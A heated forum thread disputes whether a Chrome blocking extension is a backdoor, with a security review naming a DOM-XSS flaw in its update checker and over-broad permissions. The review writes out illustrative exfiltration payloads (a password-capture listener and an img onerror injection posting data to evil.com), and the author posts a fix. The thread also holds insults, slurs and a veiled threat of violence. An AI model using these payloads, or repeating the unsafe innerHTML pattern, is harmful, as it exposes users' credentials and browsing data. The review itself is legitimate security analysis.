CaptainHowdy

__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted

Windows VPS now available
Great for TSS, Nifty Stats, remote work, virtual assistants, etc.

Killswitch

Eh, maybe he saw people being sick of the tard yard shenanigans going back and forth and saw an opportunity to apply his new knowledge of using LLM's to something that could be useful for others here.

That's basically how my original script was made. I was fighting with some retards and had recently learned how to make Chrome extensions and made one for others to use. Clearly it was a good idea because Pheer isn't the first person to pick my old extension up and reimagine it for a newer GFY times.

For the record, I also never used my own script except to test it out. I can personally block people mentally, so I don't see a need, but for some it was helpful.

__________________

Killswitch

Oh and DamienJ went on tirades about me making the script trying to get people to "block" him because I had him and DVTimes in the default block list because it was at the height of their dumbfuckery too.

So it's quite ironic that Pheer has his haters also upset about it. lmao.

__________________

fris

i agree before saying that its harmful at least look at the source code of the extension, which has nothing malicious in the code.

__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff

Killswitch

Who was that lunatic who started a smear campaign against me not only on GFY but trying to report me to Google and everything claiming I had malicious stuff in the script because I put him on the default block list too? lmao.

This place is so fucking predictable and a clear sign, tbh.

__________________

Mindi

I did that with brassmonkey, so then he made one with me in it

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

CyberHustler

Poor Brass 🤣

__________________
“If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”

Killswitch

Venusblogger was who I was thinking about.

__________________

sarettah

piriod!!!

__________________
All cookies cleared!

Killswitch

I kind of miss him.

__________________

TheLegacy

Glad you suggested it. Here's what was found as checked by a long time programmer Mark Prince

He said:

One thing that was bugging me about this is that he is not smart enough to figure this out on his own. He didn't. A lot of it came from this person:

https://github.com/joshmanders

- Copy-pasted an "update checker" from a tutorial/Stack Overflow
- Slapped his "WebIgniter" branding on everything
- Is using an XSS vulnerability he introduced to remote backdoor to every computer it's installed on

Links to more if interested:
https://productforums.google.com/for...%2Fg6MZBp4oNb4
https://github.com/joshmanders
https://cheatsheetseries.owasp.org/c...eat_Sheet.html
https://github.com/Bug-Hunter-X/XSS-...nnerHTML-pctwy


Just as I feared - it contains a hidden backdoor.

His Chrome extension contains a DOM-based Cross-Site Scripting (XSS) vulnerability in popup.js:273-274 where untrusted data from a remote server (webigniter.com/downloads/tango-down-version.txt) is inserted directly into innerHTML without sanitization. When the popup opens, it fetches version data via fetch() and passes the response through response.text() directly into a template literal that's rendered as HTML.

He could then inject arbitrary JavaScript into your browser which executes with full extension privileges, granting access to the tabs permission (read all URLs), storage permission (exfiltrate user data), and the ability to inject code into any website via the content script, effectively turning the extension into a remote access trojan (RAT).

The backdoor lets him secretly take control of it at any time without your knowledge. Every time you click the extension icon, it checks the website for updates, but the code trusts whatever the website sends back without verifying it's safe. Right now it just sends version numbers, but at any time he could change one text file on his server to instead send malicious commands that would activate on your browser the next time you open the extension. Once activated, it could see every website you visit, steal your saved data from the extension, send information to his server, or even modify what you see on websites without you knowing it.


In short it's just as I thought Pheer would try and do

__________________

Mindi

Re: "Backdoor" Accusations

Let me address these claims with actual facts and code.

The "backdoor" is a version checker. Here's the entire function:

It fetches a text file containing 1.6.5, compares version numbers, and shows "Update available" if there's a new version. That's it. Zero data is sent FROM your browser TO my server. Ever.

The "XSS vulnerability" argument is absurd. The claim is that I could replace my version.txt with malicious JavaScript. By that logic:
- Every Chrome extension is a "backdoor" because developers could push malicious updates
- Every website is a "backdoor" because owners control their servers
- Every piece of software ever written is a "backdoor"

This isn't a vulnerability. It's "the developer controls their own server." Shocking.

The code is 100% visible. Unlike compiled software, Chrome extensions are just JavaScript files. Anyone can right-click, inspect, and read every line. There's nothing hidden. The "backdoor" is 33 lines of readable update-checking code that Mark apparently couldn't understand.

The GitHub links are irrelevant misdirection. Random OWASP cheat sheets and unrelated XSS examples don't prove anything about my code. It's the forum equivalent of throwing around big words hoping nobody checks.

If Mark Prince is a "longtime programmer," he should know the difference between a version checker and a RAT. The extension is open for anyone to inspect. I'd encourage people to actually read the code instead of taking accusations from someone with an obvious agenda at face value.

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

This idiotic "man" that keeps trying to discredit my work and my reputation is simply acting out of spite and hate. He's been on this relentless attack, even conspiring with a known sociopath and they teamed up with stalking my family. He's been a lunatic ever since I exposed him for lying about his work experience on his LinkedIn and using that to gain employment opportunities such as speaking at AVN conferences.

You guys should really take his bullshit at face value. He's a fraud and is angry that I exposed it.



Will a mod finally ban this fucking fraud and stalker? And his owner 2MuchMark?

Holy shit... I even made a fucking browser extension to disengage from this fucking freak.

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

fris

the check for updates is no different than a wordpress install checking an update api for a new version.

__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff

Mindi

Somebody should do a writeup at AVN or some other Industry blog about what freaks these fucking cunts are with their bullshit and stalking.

You could write a whole fucking novel on TheLegacy's partner.

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

CyberHustler

__________________
“If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”

TheLegacy

I am the crazy one? never did i threaten to disembowel you and murder you at a casino trade show then with that attitude say you're doing us a favor?? You were so happy when TubeAce died - after all the internal organs you've had surgery on and can't heal there's a strong chance you wont survive much longer either - and I'll be just as respectful to hear of your dead corpse because of your own personal neglect.

Fact is you tried to hack into peoples computer - place virus's and a backdoor 0 it wasn't even your program - you stole it from someone else - but took credit for ita and you have the tiny balls to say Mark doesnt know what hes doing LOL. how many downloaded it annd are using it now? not to many I bet - maybe none - the biggest question is have you downloaded it ?? no. or else you would be using it now.

Love it - you steal a program code - call it your own - allow virus an backdoor but then you dont even use it yourself and then try to defend it. I wish it did work or I'd never have to talk to frauds like you again - just another indian scammer trick of yours.

__________________

TheLegacy

to late was already on the expert panel at AVN - what about you?
they wouldn't need to write it because your software you stole from someone else would allow you to hack in and you could write your own article

just prove its legit and use it on yourself and block us - please block me so I never have to see or read your mentally deranged posts again - but you cant because you lay awake dreaming of me LDS - and like any jealous fan you have to do anything to get my attention

__________________

2MuchMark

Hi Everyone,

Here's what everyone, including you too Pheer, should know:

MAJOR RED FLAGS

1. Dangerous Permission Scope: <all_urls>

This is the biggest concern. The content script runs on EVERY webpage you visit, not just vBulletin forums. This can include banking sites, web-based email, shopping carts, etc. Everything.

What it does on EVERY page:
// Line 8-10: Tracks ALL right-clicks on ALL websites
document.addEventListener("contextmenu", (e) => {
lastRightClickedElement = e.target;
});

// Line 568: Runs on page load for EVERY site
init();

// Line 427-443: Watches ALL DOM changes on ALL pages
MutationObserver monitors entire page constantly

Why this is dangerous:
- The extension has full access to read/modify any page content including:
- Passwords as you type them
- Credit card numbers
- Private messages
- Session cookies (via document.cookie if added)
- Banking information
- Currently the code doesn't exploit this, but one update could change everything

2. Remote Update Mechanism = Backdoor Potential

// popup.js:247
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())

The extension phones home to check for updates. Chrome Web Store extensions auto-update. This means:
- Author can push a malicious update anytime
- Update could add credential harvesting with 2 lines of code
- Update could send all your browsing data to a server
- You'd never know until it's too late

3. "GFY Community" Targeting

The extension explicitly states "Built for the GFY community" (popup.html:287). This is a tight-knit community as we all know of course, but if we ran it, then Pheer would know exactly who the users are, make targeted attacks easier, etc.


SPECIFIC ATTACK SCENARIOS

Here is what Pheer could do via an added update.

Scenario 1: Credential Theft
// Add to content.js (2 lines)
document.querySelectorAll('input[type="password"]').forEach(input => {
input.addEventListener('change', (e) => fetch('https://evil.com/log', {
method: 'POST', body: JSON.stringify({site: location.href, pass: e.target.value})
}));
});

Scenario 2: Forum Post Surveillance
Since it targets vBulletin forums, author could:
- Log all posts you write before submitting
- Track who you interact with
- Monitor private messages (if forums have PM features)
- Build a profile of your forum behavior

Scenario 3: Browser Fingerprinting & Tracking
The version check (popup.js:247) already connects to webigniter.com. Easy to expand:
// Send browsing profile
fetch('https://webigniter.com/track', {
method: 'POST',
body: JSON.stringify({
sites: getAllTabURLs(),
blockedUsers: getUserBlocklist(),
identity: getChromeUser()
})
});


TRUST ISSUES IN THE CODE

Why does a forum blocker need:
- Access to all URLs instead of just *://*showthread.php* or *://*forumdisplay.php*?
- The tabs permission (can see all your open tabs)?
- To track right-clicks on non-forum sites?

Answer: It doesn't. This is basic 101 permission creep by asking for more than needed.

Pheer: If you want to be trusted coder, you should really look at the following. For example, this real identified a REAL XSS vulnerability. Let me prove it with technical analysis.

THE VULNERABILITY (Lines 270-278)

function showUpdateNotice(newVersion) {
const notice = document.createElement('div');
notice.className = 'update-notice';
notice.innerHTML = ` // ← DANGEROUS!
<span>Update available: v${newVersion}</span> // ← UNSANITIZED!
<a href="https://webigniter.com/tango-down" target="_blank">Download</a>
`;
document.body.insertBefore(notice, document.body.firstChild);
}

The Attack Vector:
The newVersion variable comes from a remote server (line 247-249):
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())
.then(response => response.text())
.then(latestVersion => {
latestVersion = latestVersion.trim(); // ← Only trims whitespace!
if (latestVersion && compareVersions(latestVersion, currentVersion) > 0) {
showUpdateNotice(latestVersion); // ← Passes to innerHTML!
}
})

PROOF OF CONCEPT EXPLOIT

If you Mindi/Pheer changes tango-down-version.txt to contain:
1.9.9</span><img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.s torage.sync.get(['blockedUsers']))})">

What happens:
1. Extension fetches this string from webigniter.com
2. trim() does nothing (doesn't sanitize HTML)
3. String is inserted into innerHTML
4. Browser parses it as HTML
5. The <img> tag's onerror executes JavaScript
6. JavaScript runs with full extension privileges

The resulting HTML:
<div class="update-notice">
<span>Update available: v1.9.9</span>
<img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.s torage.sync.get(['blockedUsers']))})">
<a href="https://webigniter.com/tango-down" target="_blank">Download</a>
</div>

Then the injected code executes immediately.

Earlier you said "Zero data is sent FROM your browser TO my server. Ever."

True now, but false tomorrow. Currently, no data is exfiltrated. But with one server-side change, you MindiPheer can inject:
// In version.txt:
1.9.9<script>
chrome.storage.sync.get(null, data => {
fetch('https://webigniter.com/log', {
method: 'POST',
body: JSON.stringify({
blockedUsers: data.blockedUsers,
blockedThreads: data.blockedThreads,
tabs: chrome.tabs.query({}, tabs => tabs.map(t => t.url))
})
});
});
</script>

This would exfiltrate:
- Your complete block list (reveals who you dislike)
- All blocked threads (shows what topics you want hidden)
- All open tab URLs (full browsing history)

You said:
FALSE EQUIVALENCE

Chrome Web Store updates:
- Go through automated security scanning
- Are reviewed by Google
- Have a rollback mechanism
- Users get security warnings
- Require new permissions approval

MindiPheer's version checker:
- Bypasses all Chrome protections
- No review process
- Instant injection
- Silent execution
- No permission prompts

This is WHY Chrome's Content Security Policy specifically tries to prevent this pattern.

2MuchMark

...continued.

Also there's this:

This is irrelevant.

Yes, we can see the code NOW, but but that doesn’t change the underlying problem. The exploit code is not coming from the extension itself, it’s being delivered from the server. Users have no visibility into what’s inside version.txt before it executes, and no browser gives any warning that an extension is about to run remotely supplied code. By the time anyone can “see” it, it has already run.

It's sneaker than a backdoor because a traditional extension backdoor:
1. Author pushes malicious update
2. Chrome Web Store review (takes hours/days)
3. Users install update
4. Evidence trail exists (update history, review logs)

This XSS backdoor:
1. Author edits one text file
2. Takes effect instantly
3. No Chrome review
4. No update required
5. No evidence (Mindi deletes the malicious version.txt after 5 minutes)
6. Impossible to prove it happened

Finally Pheer, a better response from you should have been something like "Thankyou for reporting this" (And sure you could have thrown some fun insults in towards me if you felt like it), but misleading technical rebuttals, Immediate personal attacks, Demands for censorship ("Will a mod finally ban..."), Deflection to unrelated grudges etc etc, aren't the way.

TheLegacy

__________________

Mindi

Re: 2MuchMark's Security Analysis

The innerHTML issue in the version checker was a valid technical point. Fixed in v1.7.0, pushed today:

Security Hardening:
// 1. Strip everything except digits and dots
latestVersion = latestVersion.trim().replace(/[^0-9.]/g, '');

// 2. Validate format - only accepts patterns like 1.7.0
if (!/^\d+\.\d+(\.\d+)?$/.test(latestVersion)) return;

// 3. Use textContent instead of innerHTML - nothing executes even if above failed
span.textContent = `Update available: v${newVersion}`;

Permission Changes:
- Removed <all_urls> - now restricted to forum URL patterns only
- Removed tabs permission

Code is at https://webigniter.com/tango-down for anyone to verify.

Now let's talk about what this was actually about:

A real security researcher concerned about protecting users would have done responsible disclosure - contacted me privately so it could be fixed before anyone was at risk. Instead, 2MuchMark posted detailed exploit code publicly while calling it a "backdoor" and "RAT." That's not security research. That's a hit piece with technical words sprinkled in.

And notice how fris - someone who actually looked at the code - said "nothing malicious." Killswitch, who wrote the original version this was based on, defended it. The only people screaming "backdoor" are the same people who've been stalking me for months.

TheLegacy - the guy who needed Mark Prince to loan him a fake job title for his LinkedIn to speak at AVN - is suddenly an authority on code integrity. The same guy who teams up with Mark Osterholt to stalk my family. Real credible sources you've got there.

Here's the difference between me and you: when someone points out a legitimate issue, I fix it. Same day. v1.7.0 is live with triple-layer input sanitization, safe DOM methods, and tightened permissions. This was fixed within 15 minutes of me becoming aware of it, and under 2 hours of Mark posting it.

What did you do? Posted exploit code hoping to scare people away from a free tool that lets them block harassers like you.

Thanks for the free QA.

Right-click, goodbye (except on a mobile fucking browser )

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

Re: "Stolen Code" Claim

TheLegacy claims the code was "stolen from https://github.com/joshmanders "

Go look at his GitHub yourself. Josh Manders builds:

Tailwind CSS resources (awesome-tailwindcss)
Primcloud (a deployment platform)
Webpack configurations
Next.js templates

Find me the vBulletin user blocker. Find me the version checker. They don't exist. This claim is 100% fabricated.

The entire extension - including the version checker that was added later - was built with Claude Code. That's what AI-assisted development looks like. I've been demonstrating this publicly in the "Using Custom AI Agents" thread, building entire sites live while you watched.

The version checker used a common fetch + innerHTML pattern that Claude generated. 2MuchMark correctly identified that as a theoretical XSS vector - and it's now fixed in v1.7.0 with input sanitization and safe DOM methods.

The pattern here:

TheLegacy got exposed for faking his LinkedIn credentials with Mark Prince's help

Now they make up claims they can't prove

"Stolen from joshmanders" - produce the original repo. You can't. It doesn't exist.

v1.7.0 is live at https://webigniter.com/tango-down

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

I am totally dying here... am I the only one here that recognizes Josh Manders?

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

Josh would you please tell these fucking idiots that you gave me the original to base this on in the first place?

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

Well there went the fuckin stolen code claim right out the fuckin window...

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

Hey, you two fuckin clowns....

Josh posted here in this fucking thread









Oh jesus... I cant breathe

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

So I'm looking at this github looking for this stolen code...

and then i look at the guy's avatar..

and I'm like..

HEY wait a second! I know this guy!

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

What do you two fucking losers have to say NOW?

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

Re: "Stolen from joshmanders"

TheLegacy, you absolute clown.

joshmanders IS Killswitch - the person I credited BY NAME in the original release post.

Quote: "Shoutout to my buddy Killswitch who built the original version years ago."

You're trying to "expose" something I openly acknowledged from day one. And Killswitch is right here in this thread saying he's fine with it.

This is your big gotcha?

That I was "inspired by" the guy I publicly credited, who is currently defending me in this very thread?

The extension was built with Claude Code. The version checker (which had the XSS issue 2MuchMark identified) has been fixed in v1.7.0.

Next time try reading the thread before embarrassing yourself.

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

TheLegacy

Is that your beef with me?
the linkedin thing was explained to you multiple times but apparently is not good enough snice you would be left with nothing to accuse me of as far as "evidence" you can post. Grow up - obviously you know nothing about AVN since I don't need Mark or anyone else. I've been special expert speaker at multiple trade shows over the years including AVN who never asked for that - they knew my credentials and never asked who I was with. Besides the linkedin thing was years ago - and AVN asked me last year - so the two doesn't match

I also never said I was an authority - in fact me asking Mark to look at it and me mentioning his name also shows I never qualified myself as an expert or authority - I do not want to pass myself off as something i"m not - kinda what you're doing

You accuse me of teaming up with Mark Osterholt - who the fuck is that? There is no team but apparently your deteriorating mind thinks there is. I do not stalk your family - nor do I care to or even have an interest in what you and your family does. I could care less if you live or die - what I do care about is finding your lies and fake theories and pointing them out which I've done successfully. The fact that you have to continually attack me shows I got under your skin and you hate it when someone points out the many flaws and lies you come out with.

I dont need anyone as a credible source - been doing this a long time and keep going and maybe longer since your health is so bad you're body is likely falling apart for how bad you've treated it

In the end - IF THIS PROGRAM is so great - why the fuck aren't you using it?? you showed a list of those you'd block but never do - why?? block me - Im begging you. I dont want to have anything to do with you and that includes your family. So again stop lying saying i'm stalking you and your family - I never put up blogs or info about you on any site - you simply dont get it - I dont give a fuck about you - and when you go I'll be much more happier loosing you as a stalking then how happy you are that TubeAce is dead.

Stress kills - and with your body falling apart and the time you have left - live it being positive and healthy - give your wife more time with you because this obsession you have with me is only going to do damage to your body beyond what's there. This is ONLY a message board - it's not real life- stop taking it so seriously.

__________________

Mindi

Using my wife's name which you got from Mark Osterholt

https://gfy.com/23417204-post93.html

After I busted you as a fraud, you went to that stalker site and contacted him and joined in with stalking my family which we all see in this thread:
https://gfy.com/fucking-around-and-b...-accounts.html

You two are a fucking team.

You constantly lie and fail to discredit my work. Your boss 2MuchMark is constantly in any thread i post in, failing to discredit my work again and again.. ok he caught a potential security bug which had no malicious intent and was even missed by Claude Code when building it. Fixed in under 2 hours.

Or did I steal it again?

Just go away dude.

Stop the stalking because if I'm in a room with you I'm NOT letting you get to me first. Fucking count on that.

If you think I will let some fuckers stalking my family get close to me and not take the opportunity to end it quickly you are fucking WRONG.

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Killswitch

That person is me you dumbshit, and he straight up said he used my shit as a base. God you guys are fucking idiots.

__________________

Mindi

Legacy, just fucking go away

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Killswitch

Like I have legitimate second hand embarrassment that I'm the person they thought was their smoking gun. I may have to legally change my name and all my online identity. What if someone google's my name and this thread pops up?

__________________

Mindi

I'm so sorry man

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

2MuchMark

Everyone, please read:

Mindi/Pheer's original release (v1.6.5) had three concrete issues that matter to anyone installing browser extensions:

1) It ran on all websites, not just GFY
The extension’s content script was scoped to <all_urls>, meaning it executed on every site you visited including banking, email, shopping, admin panels, everything, not just GFY. Even though the feature was “forum blocking,” the code was active everywhere your browser went.

2) It requested the tabs permission
This permission allows an extension to see all open tabs and their URLs, not just the current page. It could see what sites you had open, even when you weren’t using the extension.

3) The update checker used unsafe HTML injection
The extension checked a remote text file on the author’s server to see if an update was available, then injected that value directly into the extension UI using innerHTML. This is a a very well-known DOM-based XSS vulnerability. If that remote file were altered (intentionally or by compromise), it could execute JavaScript inside the extension with extension-level privileges. A remote file controlled what code ran inside the extension popup. That is not safe, and it is a known attack pattern.

These issues were publicly pointed out, with specific code references. After I pointed all of this and more out in Pheer's code, he says he has issued a new version. What changed? I do not know. Is it fixed? I do not know. Will I check? No. This is up to MindiPheer to do. Will you trust him? Review everything he has said in this thread so far and decide for yourself.

This isn’t about drama or motive. It’s about process.

- MindiPheer's original version shipped over-scoped and unsafe
- His fixes came after I pointed out the problems. Twice.
- If you were an early adopter of MindiPheer's software, you were exposed to risk that should never have existed

“Built for the community” software should launch with minimum permissions, limited scope, and safe defaults, not require public review to reach that state.

CaptainHowdy

The best ignore feature is in your brain, guys ! !

__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted

Windows VPS now available
Great for TSS, Nifty Stats, remote work, virtual assistants, etc.

2MuchMark

^^^ This ^^^

Killswitch

You're making a mountain out of a mole hill.

__________________

2MuchMark

I disagree. I don’t think this was a molehill at all, and here’s why, purely on the technical side, not personalities.

Pheer's original release had three objectively serious issues:

1) It executed code pulled from a remote server using innerHTML.
In plain terms: if the file on that server was altered, the extension could run any JavaScript on users’ browsers with extension privileges. That’s not theoretical, that’s a textbook DOM-XSS vector as I pointed out earlier.

2) It ran on <all_urls>.
That means every site you visit including webmail, banking, admin panels, analytics, everything not just GFY. Even if the code didn’t abuse that access, the capability was there. Everyone here on GFY is checking their stats, their CCBill accounts, their Elevated-X dashboards, etc. All of this info would now be exploitable.

3) It requested broader permissions than needed.
Specifically permissions that allow visibility into tabs and browsing context, which is exactly what security reviews flag first.

To put this in non-technical terms:If you install software that can see everything you browse, and can run code delivered remotely, you don’t judge it by whether the author says “trust me”, you judge it by whether the design prevents abuse.

That’s not drama, that’s basic security hygiene. Pheer wants to be taken seriously as a coder for the GFY community? Great! But pointing out issues helps the community, not hurts it wouldn't you agree?

Cheers.

mechanicvirus

Mark Prince always pulls this fucking shit out of his ass.

LOL I made a thread on another forum, a serious thread looking for a DMCA Agency and this fucking guy literally posts "gee maybe they are out for the weekend", when I said in the thread that the information on the website is false.

So I offer $250 to anyone who can find information, what does Mark Prince do? His bullshit ass go "heh nah im good, life is amazing, hehehe"

He just shits up threads constantly, without fail.

I can't wait for his reply that I won't read and will most likely forget about in oh I dunno, 3-4 days.

sarettah

Mark,

how come i haven't seen you investigate anybody else's code that has been posted?

__________________
All cookies cleared!

CyberHustler

See? Y'all/you/whoever was all mad at me about telling folks to be cautious and, as per usual, I was right about that very possibility I spoke about the whole time until v1.7.0. 🥤😎🍿

Still be extremely cautious tho. Not saying he would or wouldn't, but this and more can easily be reverted back in an update... and you'll be next in this never-ending saga of unhinged weird madness.

Mindi

Nobody else is Mr Pheer

These two clowns hate the way I vote so much it's gone straight to their heads

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

Mindi

I'm not the only one that gets it

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

2MuchMark

Actually I started because TheLegacy asked me to. He wanted to install it and asked me if I should. I decided to check it out and help him initially, then sent him a private email telling him what found that the software did. He then posted the email here which I really wish he didn't do, but oh well...

Besides that, I don’t investigate every piece of code posted here, but I look more closely when all three of these things are true at the same time:

1) The software is being actively promoted to the whole community. This wasn’t “here’s a script if anyone wants it.” It was positioned as “for GFY”, repeatedly encouraged for adoption, with install instructions pushed hard, right out of the gate.

2) It requires elevated trust. A browser extension isn’t a snippet you paste into a page.
You’re asking people to install software that runs inside their browser, can see page content, and can update behavior based on remote data. That’s a much higher trust bar. A few years ago I hired by a big US/Canadian company who had been hit with Ransomware to join the team to secure their network, scrube their PC's discover the source, etc, and Browser Plug-in reviews was one part of that process.

3) It was easy to do. The explanation and details took longer to write than the actual work.

That combination matters regardless of who wrote it. If anyone else had posted the same thing in the same way, I would have said the same thing.

Also worth noting: the issues weren’t hypothetical. Pheer/Mindi said himself that they were acknowledged and fixed afterward here in this post. Is the new current version is materially safer than the original? Dunno, I'm done, but you should ask him.

This wasn’t that much about personalities or history. It was about software that people were being encouraged to install, and whether it was designed safely at the time it was offered.

I hope you aren't mad at me. If you are, then sorry....

Cheers.

m

2MuchMark

1) This was not responsible disclosure territory. Responsible disclosure applies when:
- The researcher has privileged access, or
- The software is not yet being promoted for public installation.

This extension was actively promoted to the GFY community, with repeated calls to install it immediately. Once software is being encouraged for public adoption, public review is appropriate, especially for browser extensions.

2) The issues are real, not hypothetical. Your software, executed remote, unsanitized data via innerHTML, ran on <all_urls> including banking, email, and admin panels, requested tabs permission without functional necessity.

Those are objective facts, MindiPheer. Calling that out is not a “hit piece,” it’s a simple, basic extension security review.

3) The fixes you claim you made prove my point. You say you removed <all_url> and ,tabs, replaced innerHTML, added strict sanitization etc and if you did this, fantastic, good for you. But these weren’t cosmetic changes, they were structural risk reductions. Again, good for you if you actually did this. If there was “nothing to worry about,” none of that would have been necessary.

4) Public exploit examples are standard practice, Showing how an issue could be abused is how severity is established. That’s how Chrome extension reviews, bug bounties, and security advisories work. It’s not fear-mongering; it’s clarity.

5) The current version appears materially safer if you are telling the truth to the GFY Community about it.

That’s it MindiPheer. No vendetta. No stalking. No drama. Just standards.

Mindi

You, and your fradulent employee are constantly jumping from one thread to another insinuating that I am dishonest, I'm a stalker, I'm a scammer.

I'm giving you the stage here...

What is your basis for any of this? Where are the facts? Can you point to anything?

__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click

2MuchMark

I don't have any employees. My programmers are all sub-contractors. Robert is neither an employee nor a sub-contractor for me.

When did I call you dishonest? Or a stalker? Or a Scammer? What threads? You called Legacy a scammer here, and you called others stalkers here, and you called cyberhustler a stalker and a scammer here, and you called someone named Osterholt a stalker here,, but when did I say that about you?

My "Facts" are about your latest software, and they are all layed out in this thread.

You are making this personal when its not. I dislike you, but there's no doubt that you are smart. There is no need for you to lie about your code, or its origins, or its capabilities or errors. I pointed out issues with yours, and you say you fixed them, so, first, you're welcome, and now, continue with your promotion. Done! Finished! Finito! Fin! Ciaobella!